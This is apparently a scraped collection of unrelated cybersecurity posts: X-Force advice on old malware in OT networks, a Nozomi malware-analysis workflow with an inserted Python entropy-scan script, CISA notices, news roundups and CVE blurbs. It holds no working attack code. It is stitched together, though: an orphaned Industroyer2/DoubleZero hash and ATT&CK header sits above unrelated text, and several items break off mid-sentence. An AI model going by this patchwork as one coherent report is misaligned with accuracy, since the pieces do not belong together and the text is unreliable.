SHA256   7062403bccacc7c0b84d27987b204777f6078319c3f4caa361581825c1a94e87   Industroyer2
SHA256   3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe   DoubleZero
SHA256   30b3cbe8817ed75d8221059e4be35d5624bd6b5dc921d4991a7adc4c3eb5de4a   DoubleZero

Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

TA0001: Initial Access
  T1190: Exploit Public-Facing Application

TA0002: Execution
  T1047: Windows Management Instrumentation
  T1569: System Services
    T1569.002: Service Execution

TA0008: Lateral Movement
  T1021: Remote Services
    T1021.002: SMB/Windows Admin Shares

TA0005: Defense Evasion
  T1070: Indicator Removal on Host
    T1070.004: File Deletion
    T1070.001: Clear Windows Event Logs
  T1112: Modify Registry
  T1484: Domain Policy Modification
    T1484.001: Group Policy Modification

TA0011: Command and Control
  T1102: Web Service
    T1102.003: One-Way Communication

TA0040: Impact
  T1485: Data Destruction
  T1499: Endpoint Denial of Service

TA0042: Resource Development
  T1588: Obtain Capabilities
    T1588.003: Code Signing Certificates

This post was written with contributions from IBM Security’s Sameer Koranne and Elias Andre Carabaguiaz Gonzalez.

Operational technology (OT) — the networks that control industrial control system processes — faces a more complex challenge than its IT counterparts when it comes to updating operating systems and software to avoid known vulnerabilities. In some cases, implementing a patch could lead to hours or days of costly downtime. In other cases, full mitigation would require net new purchases of potentially millions of dollars worth of machinery to replace already functional systems simply because they are timeworn.

It’s no secret OT systems face this conundrum — and it’s become increasingly obvious cyber criminals are aware of this weakness, too. While there’s no shortage of recent headlines decrying the vulnerability of these systems to the more sophisticated malware commonly used by threat actors today, those conversations have overlooked another potential — yet equally serious — threat to OT: older malware still floating in the ether.

This is malware for which most systems have been patched and protected against, immunizing large swaths of networks and effectively dropping the older malware from the radar of IT teams (and headlines). Two examples of this kind of older malware include Conficker and WannaCry.

While occurrences of these malware types plaguing OT environments are relatively rare, they do occur — and often leave organizations combating a threat that was largely forgotten.

WannaCry: The Scourge of 2017… and Beyond

The WannaCry ransomware outbreak was a watershed for cybersecurity professionals in 2017 — a moment in time many in this industry will never forget. The fast-spreading worm that leveraged the EternalBlue exploit ended up affecting more than 200,000 devices in over 150 countries. From X-Force’s perspective, WannaCry is the ransomware type they have most commonly seen at organizations with OT networks since 2018 — and, occasionally, WannaCry will even migrate into the OT portions of the network itself.

One example of WannaCry infecting an OT network is Taiwan Semiconductor Manufacturing Company (TSMC) in 2018. Despite having robust network segmentation and cybersecurity practices in place, human error led to a vendor installing a software update on the OT portion of the network using a machine unknowingly infected with WannaCry ransomware. Because the laptop used for the software installation had been patched and was using an up-to-date operating system, it was not susceptible to the ransomware — but the OT network, on the other hand, was very susceptible.

The WannaCry ransomware spread quickly across TSMC’s network and infected several systems, since the OT network included multiple unpatched Windows 7 systems. The ransomware affected sensitive semiconductor fabrication equipment, automated material handling systems, and human-machine interfaces. It also caused days of downtime estimated to cost the company $170 million. CC Wei, the CEO of the company, said in a statement, “We are surprised and shocked. We have installed tens of thousands of tools before, and this is the first time this happened.” As a result of the incident, the company implemented new automated processes that would be less likely than human error to miss a critical security step.

WannaCry continues to affect organizations with OT networks, although — thankfully — X-Force observes such incidents much less frequently today than they did in 2018 and 2019, as many organizations are able to apply patches or identify workarounds to more effectively insulate networks from WannaCry.

Enter Conficker: Continuing to Emerge in 2021

An old worm — even older than WannaCry — that X-Force has observed on OT networks in 2021, however, is Conficker. This worm emerged in late 2008 as threat actors quickly leveraged newly released vulnerabilities in Microsoft Windows XP and Windows 2000 operating systems. Conficker seeks to steal and leverage passwords and hijack devices running Windows to run as a botnet. Because the malware is a worm, it spreads automatically, without human intervention, and has continued to spread worldwide for well over a decade.

Conficker — sometimes with different names and variants — is still present in some systems today, including in OT environments. As with WannaCry, the presence of legacy technologies and obsolete operating systems — including Windows XP, Windows Server 2003, and proprietary protocols that are not updated or patched as often as their IT network counterparts — make these environments especially vulnerable to Conficker. In addition, many legacy systems have limited memory and processing power, further constraining administrators’ ability to insulate them from infections such as Conficker or WannaCry, as the system will not even support a simple antivirus software installation.

The Conficker worm is particularly effective against Windows XP machines, especially unpatched versions, which are common in OT environments. The fast-spreading nature of the Conficker worm can be a challenge for network engineers — once infected, every Windows machine connected to the network could be impacted in as little as one hour. Since many OT environments are built on 20- to 30-year-old designs, partially modified to have connectivity for ease of access, it provides the ideal environment for even the simplest malware, Conficker included.

In Conficker infections X-Force has observed, the worm is able to affect human-machine interfaces (HMIs), whose network traffic initially alerted security staff to the infection. X-Force malware reverse engineering of the Conficker worm indicates that it exploits the MS08-067 vulnerability to initially infect the host. Fortunately, in some cases Conficker malware — even when present in OT environments — has not led to operational damage or product quality degradation. Of course, this may not be the case for all network architectures on which Conficker malware may appear.

Defending OT Networks from Old Malware: Lessons From the Trenches

Even though many OT environments are running obsolete software and network topographies, there are measures organizations can take to defend against older malware strains such as WannaCry and Conficker. Often, the highest priority in an OT environment is maximizing uptime, leaving little room for maintenance, re-design, updates and their associated downtime. Yet even within these confines, there are many measures organizations can take to decrease the opportunities for old malware to get onto, spread within, and negatively affect their network.

Some of these include:

1. Network segmentation: Micro-segment the networks within an OT environment. If different lines do not need to communicate with each other, there is no need to create and maintain a large network subnet for all systems. Improve reliability of systems by segregating those in smaller subnets and restricting traffic at boundaries. In addition, an industrial demilitarized zone (iDMZ) is your best ally for compartmentalization and network segmentation. Avoid dynamic host configuration protocol (DHCP) as much as possible; should you be required to use it, subnet it to the lowest possible net mask. Configure virtual local area networks (VLANs) if possible.

2. Know what you have: Systems older than 20 years probably do not have a good electronic record in a configuration management database (CMDB) and may be missing or have outdated network drawings. Reverse engineering this information during an incident is not productive, and ensuring assets and network information is maintained accurately can go a long way. Be aware of the IPs, MACs, operating systems, and software licenses in your asset inventory. Get to know your environment up to the revision date of your software. Make clear which users are allowed to log on to machines based on specific roles; if possible, link users to a machine’s serial number.

3. Harden legacy systems to maintain a secure configuration: Remove all unused users and revoke all unnecessary administrative privileges, remove all unused software, disable all unused ports (running a packet capture can help), and prohibit using these assets for personal use. Insecure configuration of endpoints can leave open vulnerabilities for exploitation by adversaries or self-propagating malware. Identify unused and unwanted applications and delete them to reduce the attack surface. Avoid proprietary protocols as much as possible, unless they are constantly updated; check for and use better, newer protocols that are standardized.

4. Continuous Vulnerability Management: A vulnerability management program allows organizations to reduce the likelihood of vulnerability exploitation and unauthorized network access by a malicious actor and is necessary to make informed vulnerability treatment decisions based on risk appetite and regulatory compliance requirements. All necessary security and safety relevant patches must be applied as soon as feasible. If it is not possible to patch the system, ensure other compensating security controls are implemented to reduce the risk. Identify the lowest demand times in a day or week and commit to having downtime and maintenance windows for patching and updating. Routinely check for advisories on ICS-CERT and note whether your vendors are impacted.

5. Reduce SMB Attack Surface: Both WannaCry and Conficker are known to exploit SMB. Server Message Block (SMB) is a network communication protocol used to provide shared access to services on a network, such as file shares and printers. Because of its prevalence in information technology environments, adversaries commonly use this protocol to move laterally within a compromised environment, interact with remote systems, deploy malware, and transfer files. Moreover, SMB can provide a convenient way to bypass Multi-Factor Authentication (MFA) and remotely execute code. To reduce the attack surface and the overall risk associated with SMB-based lateral movement, consider the following hardening measures:

Configure Windows firewall to DENY all inbound SMB communications to workstations. This control will disable inbound connections on TCP ports 139 and 445.
Audit server SMB requirements and explicitly DENY SMB inbound on servers that do not require the protocol as part of their functionality.
Consider disabling legacy versions of the SMB protocol and migrating business applications to SMB v3.1. This activity requires careful planning and risk evaluation due to its potential impact on business operations.

6. Avoid the use of Portable Media: Uncontrolled portable media significantly increase the risks to the legacy OT environments, as OT systems may not have the latest security patches to defend against newer attack methodologies. Uncontrolled and unsecured allowance of portable media can expose an OT network to exploits and unplanned outages and downtime.

Have a security policy for secure use of portable media in OT environments.
Ideally, strictly prohibit use of USB flash drives. Should there be an absolute necessity of using one, designate a single USB stick for any maintenance and re-format it every time you use it.
Implement processes and technical controls that adequately support the security policy requirements. Controls may include, but are not limited to the following:
Every use of the device is documented in the logbook
The devices are scanned on designated quarantine PCs to ensure robust AV scan before using on OT endpoints. Ensure that anti-malware software is configured to automatically scan portable media
Control the number of portable media devices approved to be used in the environment
Disable autorun and autoplay auto-execute functionality for removable media.

Consider implementing Secure Media Exchange solutions such as Honeywell SMX or OPSWAT MetaDefender.

7. Rehearse Disaster Recovery (DR) and Incident Response (IR) scenarios regularly: DR plans should be documented, reliable backups should be available, and OT personnel must have an understanding and intimate knowledge of how the system should be recovered. IR and DR exercises should be conducted regularly to build the muscle memory needed for reliable recovery. Educate your team about imminent security threats and make them part of the security process. As part of any plan, have a direct line with your organization’s CSIRT: your best play is always a fast response and a transparent environment, so be organized and report everything.

8. Employ network monitoring solutions: Firewalls, Access Control Lists (ACLs) and Intrusion Prevention Systems (IPS) can assist in keeping a close eye on traffic traversing your network. Check for new nodes or machines communicating with suspicious assets. If you employ an intrusion detection system (IDS), ensure your signatures are up to date. Even when monitoring for old malware, new signatures appear every day.

While it isn’t common for an OT network to be infected with older malware like WannaCry or Conficker, documented cases do indeed exist, and they can leave costly destruction and even safety consequences in their wake.

To learn how X-Force can keep your network safer, download the X-Force for OT solution brief.

Read the 2022 X-Force Threat Intelligence Index Report to understand the latest OT Threats

The post Where Everything Old is New Again: Operational Technology and Ghost of Malware Past appeared first on Security Intelligence.

Analyzing New Malware

In the ever-changing world of cybersecurity, new threats appear and evolve on a regular basis. Sharing information about them is an important part of fighting cybercrime and keeping people and organizations safe. To do so efficiently, being prepared will make the best use of your—and your team’s—time when analyzing an emerging threat.

In this blog, we cover various situations that researchers encounter when they need to publish their findings and provide some suggestions on how to approach them, along with a suggested workflow for approaching the analysis most efficiently. Finally, we apply this strategy to analyze a ransomware sample.

Efficient analysis is extremely important when investigating new malware.

Challenges and Solutions

When a new threat emerges, there are a few common challenges that researchers face during analysis. Here are a few ways to handle them so you can produce clear and purposeful findings.

Urgency

In many cases, there is a relatively narrow window of time in which to release the publication, if we want the topic to be hot and the corresponding material to be relevant.

The solution is to focus on the most important questions that need answers.

Who are the potential readers of the article? How will they benefit from reading it?
How will the time costs associated with each section compare to its benefits?

Beginning your work by answering these questions will help shape the material in the right direction and manage time properly.

Novelty

For many attacks that hit the news, the related malware may not yet have been analyzed by other researchers. This increases the amount of work required to understand all parts of the relevant functionality, as there is little to no information to use as a starting point.

To address this issue, it is worth remembering that in many cases, modern malware families and attacker groups already have some roots. Tracking these connections allows researchers to find previous iterations of similar projects and reduce the amount of time required to understand malware’s functionality.

Complexity

The consequences of simple cyberattacks aren’t generally big enough to attract the attention of the public. What that means for researchers is that if something is worth writing an article about, it’s likely to be quite complex and therefore time-consuming to analyze.

The solution here might be to split the big task into smaller tasks. Apart from allowing prioritization based on the article’s focus, it also allows the analysis to be done by a group, with different people focusing on different parts of the functionality. Exchanging knowledge on a regular basis about what has already been covered will help the team to be efficient and not waste time analyzing the same parts multiple times.

Suggested Workflow

Here is a common workflow that should allow researchers to approach the analysis of new executable samples efficiently and effectively.

The second step, Behavioral Analysis, refers to the black-box-style analysis that generally involves executing a sample under various monitoring tools and in sandboxes. The Dynamic Analysis step refers to the use of a debugger to execute instructions.

1. Triage

Collect as much easily-accessible open information as possible. This can come from existing articles, public sandbox reports, or other vendors’ detections.

Check for the presence of high-entropy blocks, and inspect the import table (or syscalls) and strings to understand whether the sample is likely to be packed or not.

Check if some official (non-malicious) packers were used by using packer detection tools.

2. Behavioral Analysis

Conduct this analysis if it is easy to restore the lab environment after execution.

It may not be necessary if good public sandbox reports are already available.

Keep in mind that, often, behavioral analysis doesn’t show the full picture.

It may not go as expected because of anti-RE techniques involved.

3. Unpacking – Optional

Not always present; some malware developers prefer to rely on obfuscation alone.

For official packers, there are multiple existing unpacking tools and scripts already available.

Ideally, the unpacked sample should remain executable to make the dynamic analysis easy. Otherwise, get as much unpacked code and data as possible.

4. Static and Dynamic Analysis of the Actual Functionality

This step only becomes possible once the unpacking is done (if it was necessary).

Generally, strings and APIs give the maximum information and serve as important landmarks to facilitate navigation within the samples.

Keep the markup accurate: rename functions, create structures, define enums and leave comments where necessary.

Debugging is mainly needed to decrypt/decode/decompress code and data and resolve APIs. Static analysis is generally enough for the rest.

Applying the Workflow to Malware Analysis

Let’s take a look at a DarkSide ransomware sample, which we analyzed earlier this year: 0a0c225f0e5ee941a79f2b7701f1285e4975a2859eb4d025d96d9e366e81abb9

Step 1: Triage

At the time of analysis, the sample had already been uploaded to Virustotal, so all cybersecurity community members could benefit from access and were able to see AV vendors’ detections as well as the sandbox logs in the Behavior tab. Note that there are now multiple sandboxes supported in Virustotal, so try a few to find a good report.

Multiple sandbox options on Virustotal.

Multiple sandbox options on Virustotal.

A quick look at the sample in the hex editor reveals that there is a high-entropy block at the end. There are multiple things it could be: the next stage payload or another module, a blob containing encrypted strings or configuration, etc. Static analysis will be required to understand it.

A high-entropy block.
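The triage check above (and the "high-entropy blocks" item in the workflow) can be automated rather than eyeballed in a hex editor. The following is an added example, not Nozomi’s tooling or the script from their DarkSide post: it computes Shannon entropy over fixed windows of a file, merges adjacent windows above a threshold into regions, and reports whether the file ends in such a region, which is the pattern seen in this sample. The window size, threshold and the sample file are constructed assumptions for illustration.

```python
"""Sliding-window entropy scan for triage (added example, not the blog's code)."""
import math
import random
from collections import Counter
from typing import List, Tuple

Region = Tuple[int, int, float]  # (start offset, end offset, peak entropy in bits/byte)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant run, 8.0 for a perfectly even byte spread."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def find_high_entropy_regions(data: bytes, window: int = 512, threshold: float = 7.0) -> List[Region]:
    """Scan fixed windows; contiguous windows at or above the threshold form one region.

    Compressed or encrypted data sits close to 8 bits/byte, x86 code is usually
    around 5 to 6.5 and text around 4 to 5, so 7.0 separates them with margin even
    though a 512-byte window slightly under-estimates the entropy of random data.
    """
    regions: List[Region] = []
    for start in range(0, len(data), window):
        chunk = data[start:start + window]
        h = shannon_entropy(chunk)
        if h < threshold:
            continue
        end = start + len(chunk)
        if regions and regions[-1][1] == start:
            prev_start, _, prev_peak = regions[-1]
            regions[-1] = (prev_start, end, max(prev_peak, h))
        else:
            regions.append((start, end, h))
    return regions


def ends_with_high_entropy_block(data: bytes, regions: List[Region]) -> bool:
    """True when the last region runs to EOF: a trailing blob (next stage, config or encrypted strings)."""
    return bool(regions) and regions[-1][1] == len(data)


def build_sample_file() -> bytes:
    """Constructed input: 4 KB of repetitive text followed by 2 KB of seeded pseudo-random bytes."""
    text = (b"The quick brown fox jumps over the lazy dog. " * 92)[:4096]
    rng = random.Random(42)
    blob = bytes(rng.getrandbits(8) for _ in range(2048))
    return text + blob


if __name__ == "__main__":
    sample = build_sample_file()
    found = find_high_entropy_regions(sample)
    for start, end, peak in found:
        print(f"high-entropy region 0x{start:x}-0x{end:x} ({end - start} bytes, peak {peak:.2f} bits/byte)")
    print("trailing blob:", ends_with_high_entropy_block(sample, found))
```

To run it on a real sample, replace `build_sample_file()` with the bytes of the file under analysis; a trailing region then tells you where to start looking for cross-references in the disassembler, as the unpacking step below does by hand.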

There are pretty much no meaningful strings and APIs:

Very few entries in the import table.

This is a strong indicator that the sample is obfuscated with APIs resolved dynamically and strings encrypted. Running a packer detection tool (PEiD with custom community signatures) confirms that there is no indication that public packers have been used in this case.

PEiD did not identify any known packers.

Step 2: Behavioral Analysis

By the time the analysis began, the sample had already been submitted to various public sandboxes by other community members, so lots of information could be taken from there.

File activity in the public any.run report.

Step 3: Unpacking

Checking cross-references to the high-entropy block in the disassembler, we can see that this doesn’t seem to be the next stage payload as there is no control transfer to it or related blocks. In addition, a quick look around the disassembly confirms that the sample is indeed obfuscated rather than packed with multiple APIs resolved dynamically by hashes and with strings encrypted.

API resolution by hashes.

A call to the not-yet-resolved API.

Step 4: Static and Dynamic Analysis of the Actual Functionality

In order to be able to efficiently navigate the disassembly, we need to make APIs and strings easily readable.

For APIs, this is very easy to achieve with dynamic analysis, as all the APIs are resolved in a single function. Therefore, letting it execute until the end will give us all the APIs’ addresses. To propagate their names to the pointers, use the standard renimp.idc script shipped as part of IDA Pro.

Resolved APIs’ names.

This approach won’t work for strings, as they’re decrypted on an ad-hoc basis just before being used, rather than in a single place. Therefore, to make them easily visible, scripting will be required. In our blog on Darkside, we have already provided such a script that will attempt to find all the encrypted strings and decrypt them.

Before string decryption.

After string decryption.

That’s it. Now that both strings and APIs are visible, the only thing left is to carefully go through the cross-references, keep the markup for the corresponding functions accurate, and describe all potentially interesting information (subject to the target audience) in the article.

Conclusion

Knowledge sharing is an important part of the cybersecurity field that allows us to quickly adapt to new threats and minimize their associated risks. By properly focusing our efforts, we can improve the quality of this process and make the world a safer place.

Extra Tips

Know your audience – the content of the technical blog post (and the corresponding questions to answer) will be very different from a news article for the general public
Consider teamwork to speed up the process – asking for help at an early stage increases the total time available for the analysis
Have your templates ready – simple scripts to decrypt / decode / decompress the data may help avoid unnecessary delays

The post How to Analyze Malware for Technical Writing appeared first on Nozomi Networks.

Original release date: July 7, 2021 | Last revised: July 8, 2021

CISA has published a new Malware Analysis Report (MAR) on DarkSide Ransomware and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete Volume Shadow Copies available on the system.

CISA encourages users and administrators to review the following resources for more information:

AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: April 22, 2021

CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response to provide analysis of a compromise in an organization’s enterprise network by an advance persistent threat actor. This report provides tactics, techniques, and procedures CISA observed during the incident response engagement.

CISA encourages organizations to review AR21-112A for more information.



Original release date: April 15, 2021

CISA and the Department of Defense (DoD) Cyber National Mission Force (CNMF) have analyzed additional SolarWinds-related malware variants—referred to as SUNSHUTTLE and SOLARFLARE. One of the analyzed files was identified as a China Chopper webshell server-side component that was observed on a network with an active SUNSHUTTLE infection. The webshell can provide a cyber threat actor an alternative method of accessing a network, even if the SUNSHUTTLE infection was remediated.

The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR).

CISA encourages users and administrators to review Malware Analysis Report MAR-10327841-1.v1, U.S. Cyber Command’s VirusTotal page, and the following resources for more information: 

CISA web page: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
CISA web page: Supply Chain Compromise
CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations


Original release date: March 17, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on TrickBot malware. A sophisticated group of cyber criminals is using phishing emails claiming to contain proof of traffic violations to lure victims into downloading TrickBot. TrickBot is a highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.

To secure against TrickBot, CISA and the FBI recommend users and administrators review AA21-076A: TrickBot Malware as well as CISA’s Fact Sheet: TrickBot Malware for guidance on implementing specific mitigation measures to protect against this activity.

Industrial Control Systems: The New Target of Malware

During 2020, CISA issued 38 cyber alerts, ranging from nation-state actors like Iran and North Korea to known ransomware specifically targeting pipeline operations, and notably the last alert issued on December 17, 2020, Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, for the SolarWinds supply chain attack.

2020 represents a 660% increase in cyber alerts over 2019, during which CISA issued five cyber warnings over the full year.

Organizations across the board also saw a growing number of adversaries targeting and attacking industrial control systems (ICS) and operational technology (OT) networks. It’s a trend that is clearly continuing into the new year (‘Dangerous Stuff’: Hackers Tried to Poison Water Supply of Florida Town).

As the attack surface for critical infrastructure continues to expand, with owners and operators adopting new technologies to improve operational efficiency, the vulnerabilities in and targeting of ICS and OT networks are expected to rise.

The post Industrial Control Systems: The New Target of Malware appeared first on Security Boulevard.

A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.


An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.


An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

The researcher John Page (aka hyp3rlinx) launched malvuln.com, the first website exclusively dedicated to research on security flaws in malware code.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered in the underground market since 2010 for no more than $300 per license, with regular updates and customer support. They have also been used by more than 1,560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.


References:

Romanian duo arrested for running malware encryption service to bypass antivirus software | europol.europa.eu | https://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software | 20/11/2020 | English
Romanians arrested for running underground malware services | securityaffairs.co | https://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html | 22/11/2020 | English
Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malware | seguridadyfirewall.cl | https://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html | 23/11/2020 | Spanish


Since 2016, the NJCCIC has gathered cyber threat intelligence information to develop specific threat profiles on Android malware, ATM malware, botnets, cryptocurrency-mining malware, exploit kits, industrial control systems (ICS) malware, iOS malware, macOS malware, point-of-sale malware, ransomware, and trojans.

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.

Read on:

Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix-programming community commonly uses shell scripts as a simple way to execute multiple Linux commands within a single file. Many users do this as part of a regular operational workload: manipulating files, executing programs and printing text. However, as a shell interpreter is available on every Unix machine, it is also an interesting and dynamic tool abused by malicious actors.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control over a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on victim’s private messages and deleting or posting photos from their accounts, as well as execute arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to users’ phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .


Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

A severe vulnerability exists in almost all signed versions of GRUB2, which is used by most Linux systems. If exploited properly, it would allow attackers to compromise the system boot process, even when the «Secure Boot» verification mechanism is active.

The flaw was reported by Eclypsium on July 29, although the associated CVE-2020-10713 is dated March 20, and while grub2 may be more directly associated with Linux systems, machines with dual (or multiple) boot open the door to exploitation of other systems such as Windows.

A flaw was found in grub2 versions prior to 2.06. An attacker can use the GRUB 2 flaw to hijack and tamper with the GRUB verification process. This flaw also allows the Secure Boot protections to be bypassed. In order to load an untrusted or modified kernel, an attacker would first need to establish access to the system, such as gaining physical access, having the ability to alter a «pxe-boot» network, or having remote access to a networked system with root access. With this access, an attacker could forge a string to cause a buffer overflow by injecting a malicious payload that leads to arbitrary code execution within GRUB. The highest threat from this vulnerability is to data confidentiality and integrity, as well as system availability.

https://cve.mitre.org/cgi-bin//cvename.cgi?name=CVE-2020-10713

According to BleepingComputer's report, the vulnerability has been shared with operating system vendors, computer manufacturers and CERTs/CSIRTs. Advisories and possible mitigations from multiple organizations across the industry are expected to be published today.

We see the problem as having a low probability of occurrence, or at least a high degree of difficulty, since, as stated in the CVE text, special conditions are required to exploit the vulnerability. This does not mean we can stop worrying; rather, we should keep a close eye on the updates that will be arriving from the different vendors.

Here’s what’s changed in the NCSC’s guidance on mitigating malware and ransomware.

On August 1, security researchers at Proofpoint reported the details of a spearphishing campaign targeting three different United States utility companies using a malware called “LookBack.” The spearphishing emails, sent between July 19 and July 25, contained a malicious Microsoft Word attachment that installed a Remote Access Trojan (RAT) capable of performing activities like deleting files, taking screenshots, rebooting machines, and then deleting itself from an infected network.

While Proofpoint was able to confirm the presence of LookBack malware at three companies, it is likely that the malware has infected other organizations as well. The emails used in the spearphishing campaign falsely appeared to be from the National Council of Examiners for Engineering and Surveying (NCEES), an American nonprofit organization that handles professional licensing for engineers and surveyors. Fraudulently using the NCEES logo, the emails included Word documents embedded with malicious macros that, once opened, installed and ran the never-before-seen RAT.

Researchers told Threatpost that the emails were blocked before they could infect the unnamed utility companies.

How LookBack Works

According to the report by Proofpoint, LookBack is a RAT that relies on a proxy communication tool to relay data from the infected host to a command-and-control server (C2). The malware can view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.

Researchers said that the LookBack spearphishing campaign used tactics once used by known APT adversaries targeting Japanese corporations in 2018 – which highlights the rapidly evolving nature of malware and its use by nation-state actors.

The Microsoft Word document attached to the phishing emails contains a VBA macro that drops three different Privacy Enhanced Mail (PEM) files when executed. Certutil.exe is then dropped to decode PEM files, which are later restored to their true extensions using essentuti.exe. The files then impersonate the name of an open-source binary used by common tools like Notepad++, which contains the C2 configuration. Finally, the macro runs GUP.exe and libcurl.dll to execute the LookBack malware. Once executed, LookBack can send and receive numerous commands, such as Find files, Read files, Delete files, Write to files, Start services, and more.

Has Your Organization Been Exposed to LookBack? Here’s How to Detect It.

Due to the nature of the threat, it’s important to have multiple controls in place to detect the related activities. This includes continuous security awareness training for employees and personnel to help them better identify fake and malicious emails. Beyond spam filters and firewalls, Nozomi Networks Labs recommends using both anomaly detection technologies to identify unusual behavior and traditional threat detection capabilities to provide additional context around suspicious actors related to known threats.

